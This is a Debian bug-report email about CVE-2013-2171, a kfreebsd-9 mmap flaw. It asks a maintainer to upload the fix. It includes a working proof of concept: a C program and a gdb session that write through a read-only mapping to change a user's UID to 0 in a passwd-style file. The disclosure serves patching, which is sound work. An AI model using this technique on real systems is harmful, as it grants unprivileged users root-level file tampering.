Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Hi Christoph,
Please could you do an upload of SVN r4525 to unstable?
kfreebsd-9 as shipped with wheezy is indeed vulnerable and I can confirm
now that the fix works too.
Unfortunately the vulnerability is as simple and as serious as it
sounds. A non-privileged user can overwrite any file having only read
permissions.
# cat /etc/foo
steven:x:1000:1000:,,,:/home/steven:/bin/bash
$ gdb testcase
(gdb) run
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400631 in main () at main.c:13
13 *ptr = 0; /* this will segfault */
(gdb) set {char}(ptr+9) = 0x30
(gdb)
# cat /etc/foo
steven:x:0000:1000:,,,:/home/steven:/bin/bash
Regards,
--
Steven Chamberlain
steven@pyro.eu.org
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <sys/mman.h>
int main() {
FILE *fp = fopen("/etc/foo", "r");
int fd = fileno (fp);
unsigned char *ptr = mmap (NULL, 4096, PROT_READ, MAP_SHARED, fd, 0);
if (ptr <= 0) return -1;
*ptr = 0; /* this will segfault */
return 0;
}
Reply to: